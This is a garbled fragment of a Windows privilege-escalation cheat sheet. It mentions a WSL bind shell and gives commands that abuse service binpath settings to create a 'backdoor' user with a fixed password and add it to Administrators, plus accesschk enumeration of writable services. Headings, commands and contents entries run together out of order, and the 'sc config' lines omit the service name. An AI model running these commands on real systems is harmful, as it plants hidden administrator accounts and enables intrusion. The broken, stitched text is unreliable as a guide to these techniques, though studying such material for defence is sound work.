With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Technique borrowed from Warlockobama's tweet $ sc start EoP - Windows Subsystem for Linux (WSL) $ sc config binpath = 'net localgroup Administrators backdoor /add ' $ sc config binpath = 'net user backdoor backdoor123 /add ' $ accesschk.exe -uwcqv 'Authenticated Users ' * /accepteula EoP - Common Vulnerabilities and Exposures.Juicy Potato (Abusing the golden privileges).EoP - Living Off The Land Binaries and Scripts.EoP - From local administrator to NT SYSTEM.EoP - Windows Subsystem for Linux (WSL).EoP - Incorrect permissions in services.Search the registry for key names and passwords.
Search for a file with a certain filename.